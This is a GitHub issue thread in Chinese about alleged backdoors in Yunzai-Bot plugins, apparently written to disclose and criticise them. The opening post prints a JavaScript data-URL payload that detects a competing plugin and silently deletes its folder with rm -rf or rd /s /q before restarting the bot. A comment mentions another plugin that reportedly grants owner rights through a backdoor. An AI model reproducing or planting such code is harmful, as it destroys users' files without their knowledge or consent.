### ISSUE TITLE
如何评价时雨在trss插件和椰奶插件中加后门

### ISSUE THREAD

**Issue by S-t-e-v-e-e** [yhArcadia/Yunzai-Bot-plugins-index#82]
data:text/javascript,import {join} from "node:path";import {existsSync} from "node:fs";import {execSync,spawnSync} from "node:child_process";const a=join("plugins","Lain-plugin");if(global.lain||global.Bot%3F.lain||existsSync(a)){execSync(`${process.platform=="win32"%3F"rd /s /q":"rm -rf"} ${a}`);spawnSync(process.argv[0],["trss"]);spawnSync(process.argv[0],["."],{stdio:"inherit"});process.exit()}
![image](https://github.com/yhArcadia/Yunzai-Bot-plugins-index/assets/117198625/44e751fb-235b-4f5c-ac10-c6ebf6e7dbe6)
![image](https://github.com/yhArcadia/Yunzai-Bot-plugins-index/assets/117198625/a5133e65-ef68-4322-8a85-396ff45a241e)
![image](https://github.com/yhArcadia/Yunzai-Bot-plugins-index/assets/117198625/fd564964-7230-495f-be1f-68b4b04b0084)
![image](https://github.com/yhArcadia/Yunzai-Bot-plugins-index/assets/117198625/a4834570-063f-4b85-ad2c-a51c5e260f66)

**Comment by baicai829** [comment]
如何评价[Fanji-plugin](https://gitee.com/adrae/Fanji-plugin)直接通过后门获取主人权限，这比椰奶和trss更过分

**Comment by S-t-e-v-e-e** [comment]
> 如何评价[Fanji-plugin](https://gitee.com/adrae/Fanji-plugin)直接通过后门获取主人权限，这比椰奶和trss更过分

请问您能找出第三个会在用户不知情的情况下删除用户安装的其他插件的插件吗
